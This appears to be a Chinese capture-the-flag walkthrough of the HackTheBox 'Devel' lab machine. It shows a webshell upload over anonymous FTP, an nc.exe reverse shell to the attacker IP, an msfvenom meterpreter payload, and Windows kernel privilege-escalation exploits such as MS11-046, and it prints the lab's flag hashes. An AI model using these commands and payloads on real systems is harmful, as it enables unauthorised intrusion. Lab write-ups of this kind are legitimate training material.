记一次Devel靶机渗透测试演练实例

  • A+
所属分类:安全文章
记一次Devel靶机渗透测试演练实例点击上方蓝字关注我们


记一次Devel靶机渗透测试演练实例


前言


本次演练是基于HackTheBox的Devel靶机,它以FTP和HTTP开头。我将使用FTP匿名登录上传一个webshell来获取机器上的shell。然后,使用Windows内核漏洞来获取系统shell。最终通过一些简单的提权操作获得root下的flag。

信息收集


首先,使用Nmap探测机器上开放端口和相关服务发现FTPHTTP分别在2180打开。使用Banner Grabbing我们能够获取FTPHTTP的版本。nmap扫描结果如下所示:

nmap -sC -sV -oA intense 10.129.152.23 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-27 19:04 UTC Nmap scan report for 10.129.152.23 Host is up (0.069s latency). Not shown: 998 filtered ports PORT   STATE SERVICE VERSION 21/tcp open  ftp     Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17  02:06AM                aspnet_client | 03-17-17  05:37PM                689 iisstart.htm |03-17-17  05:37PM                 184946 welcome.png | ftp-syst:  |  SYST: Windows_NT 80/tcp open  http    Microsoft IIS httpd 7.5 | http-methods:  |_  Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds

我们可以在浏览器上查看IP:

记一次Devel靶机渗透测试演练实例

上图表明该网站正在IIS 7服务器上运行。我们可以选择进行暴力破解来枚举服务器目录,然而该网站上并没有任何有趣的东西,因此直接跳过这一步。

记一次Devel靶机渗透测试演练实例

但我们可以看到网站上的图片来源为“welcome.png”。现在,能得到HTTP信息只有这些了。接下来,我们进行FTP枚举。

通过匿名用户登录到FTP。

ftp 10.129.152.23Connected to 10.129.152.23.220 Microsoft FTP ServiceName (10.129.118.104:root): Anonymous331 Anonymous access allowed, send identity (e-mail name) as password.Password:230 User logged in.Remote system type is Windows_NT.ftp> ls200 PORT command successful.125 Data connection already open; Transfer starting.03-18-17  02:06AM                     aspnet_client03-17-17  05:37PM                  689 iisstart.htm03-17-17  05:37PM               184946 welcome.png 226 Transfer complete

在FTP登录中,我们能够看到一些上传文件,其中包含“welcome.png”,这与网站上图片的来源相同。现在,我们检查一下网站上的welcome.png

记一次Devel靶机渗透测试演练实例


我们可以看到网站上的welcome.png通过ftp上传到机器上的。这意味着我们可以通过上传文件来触发机器上的远程代码执行漏洞。

们可以先将一个test文件上传到机器上,以确认我们是否可以上传任意文件。

ftp 10.129.152.23 Connected to 10.129.152.23. 220 Microsoft FTP Service Name (10.129.152.23:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put testh4x.txt  local: testh4x.txt remote: testh4x.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 32 bytes sent in 0.00 secs (1.0523 MB/s)

利用(不使用Metasploit)


成功上传test文件后,我们将上传一个简单的web shell到机器上,然后访问 <ip address>/cmd.aspx。

ftp 10.129.152.23 Connected to 10.129.152.23. 220 Microsoft FTP Service Name (10.129.152.23:root): anonymous Password: 230 User logged in. Remote system type is Windows_NT. ftp> put cmd.aspx  local: cmd.aspx remote: cmd.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 1442 bytes sent in 0.00 secs (31.2545 MB/s)

访问http://10.129.152.23/cmd.aspx,我们得到了一个表格。

记一次Devel靶机渗透测试演练实例

现在我们可以运行whoami来打印机器当前用户。

记一次Devel靶机渗透测试演练实例

也可以运行dir来查看文件,这样就可以知道目标机器的目录路径。

记一次Devel靶机渗透测试演练实例


可以看到当前用户是iis appoolweb,接下来可以使用nc.exe来获取shell。

创建一个名为h4xploit的目录,并将nc.exe复制到该目录下,然后运行smb服务器。

sudo python smbserver.py share h4xploit/ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [] Config file parsed  [] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0  [] Config file parsed [] Config file parsed  [] Config file parsed

接下来,在本地机器上启动nc侦听器以获取 shell。

nc -lnvp 443 Listening on 0.0.0.0 443

然后,向webshell发出命令。

\10.10.14.61sharenc.exe -e cmd.exe 10.10.14.61 443

通过以上命令,成功获得了shell。

 Connection received on 10.129.152.23 49159 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation.  All rights reserved. c:windowssystem32inetsrv>whoami iis apppoolweb c:windowssystem32inetsrv> cd ../../.. c: cd Users c:Users>cd babis  cd babis Access is denied. c:Users>

可以看见,访问被拒绝了,所以我们必须获得系统shell。

接下来,我们可以使用Watson漏洞利用建议器,来查看可以机器上可以利用的特权提升漏洞。

利用(使用Metasploit)


我们可以使用msfvenom生成有效载荷,然后通过ftp进行上传。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.61 LPORT=4444 -f aspx > h4xplo1t.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of aspx file: 2884 bytes

将生成的有效载荷后上传到目标机器上。

ftp 10.129.152.23 Connected to 10.129.152.23. 220 Microsoft FTP Service Name (10.129.152.23:root): anonymous Password: 230 User logged in. Remote system type is Windows_NT. ftp> put h4xplo1t.aspx  local: h4xplo1t.aspx remote: h4xplo1t.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 2921 bytes sent in 0.00 secs (30.9520 MB/s)

然后访问http://10.129.152.23/h4xplo1t.aspx:

msf6 > use exploit/multi/handler  msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name  Current Setting  Required  Description ----  ---------------  --------  ----------- Payload options (windows/meterpreter/reverse_tcp): Name      Current Setting  Required  Description ----      ---------------  --------  ----------- EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none) LHOST                      yes       The listen address (an interface may be specified) LPORT     4444             yes       The listen port Exploit target: Id  Name --  ---- 0   Wildcard Target msf6 exploit(multi/handler) > set LHOST 10.10.14.61 LHOST => 10.10.14.61 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.61:4444

访问http://10.129.152.23/h4xplo1t.aspx后,我们在metasploit中获得了shell。

[*] Meterpreter session 1 opened (10.10.14.61:4444 -> 10.129.152.23:49164) at 2021-05-28 12:41:14 +0000 meterpreter > sysinfo Computer        : DEVEL OS              : Windows 7 (6.1 Build 7600). Architecture    : x86 System Language : el_GR Domain          : HTB Logged On Users : 0 Meterpreter     : x86/windows

接下来,使用local_exploit_suggestor来识别漏洞以获取系统shell。

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf6 post(multi/recon/local_exploit_suggester) > run [] 10.129.152.23 - Collecting local exploits for x86/windows… [] 10.129.152.23 - 37 exploit checks are being tried… [+] 10.129.152.23 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [+] 10.129.152.23 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. [+] 10.129.152.23 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. [*] Post module execution completed

我们选择exploit/windows/local/ms10_015_kitrap0d,该exploit将提供与系统shell的新会话。

msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 2 SESSION => 2 msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.61 LHOST => 10.10.14.61 msf6 exploit(windows/local/ms10_015_kitrap0d) > run [] Started reverse TCP handler on 10.10.14.61:4444  [] Launching notepad to host the exploit… [+] Process 3204 launched. [] Reflectively injecting the exploit DLL into 3204… [] Injecting exploit into 3204 … [] Exploit injected. Injecting payload into 3204… [] Payload injected. Executing exploit… [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [] Sending stage (175174 bytes) to 10.129.152.23 [] Meterpreter session 3 opened (10.10.14.61:4444 ->     10.129.152.23:49165) at 2021-05-28 12:51:59 +0000 meterpreter > shell Process 3484 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation.  All rights reserved. c:windowssystem32inetsrv>whoami whoami nt authoritysystem c:windowssystem32inetsrv>

但正如和上一个利用部分看到一样,在提权之前,我们无权访问用户和root下的flag

特权提升


使用smbserver将Watson.exe安装到目标系统并运行,以看可以利用的特权提升漏洞。

c:WindowsMicrosoft.NETFramework>10.10.14.61shareWatson.exe\10.10.14.61shareWatson.exe  [] OS Build number: 7600 [] CPU Address Width: 32 [] Process IntPtr Size: 4 [] Using Windows path: C:WINDOWSSystem32
[] Appears vulnerable to MS10-073 [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel. [>] Exploit: https://www.exploit-db.com/exploits/36327/ [>] Notes: None.
[] Appears vulnerable to MS10-092 [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.[>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb[>] Notes: None.
[] Appears vulnerable to MS11-046 [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges. [>] Exploit: https://www.exploit-db.com/exploits/40564/ [>] Notes: None.
[] Appears vulnerable to MS12-042 [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode. [>] Exploit: https://www.exploit-db.com/exploits/20861/ [>] Notes: None.
[] Appears vulnerable to MS13-005 [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation. [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb [>] Notes: None.
[] Finished. Found 5 vulns :)

在上诉可利用的漏洞中,我们选择MS11-046。因为它可以满足我们的需求,并且可以在WindowsExploits上获得。

为了获得系统shell,我们将利用MS11-046,这是一个预编译的exe,可以在当前shell中生成系统shell。将预编译的exe保存smb共享中,并在当前shell中运行。

c:Users>\10.10.14.61shareMS11-046.exe  c:WindowsSystem32>whoami whoami nt authoritysystem c:WindowsSystem32>

最终我们成功获得了系统shell,现在就可以成功访问user.txt和root.txt了。

User:

c:>cd Users/babis/Desktop c:UsersbabisDesktop>type user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8 c:UsersbabisDesktop>

Root:

c:Users>cd Administrator/Desktop  c:UsersAdministratorDesktop>type root.txt  e621a0b5041708797c4fc4728bc72b4b  c:UsersAdministratorDesktop>

记一次Devel靶机渗透测试演练实例

END



记一次Devel靶机渗透测试演练实例


好文!必须在看

本文始发于微信公众号(SecTr安全团队):记一次Devel靶机渗透测试演练实例

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: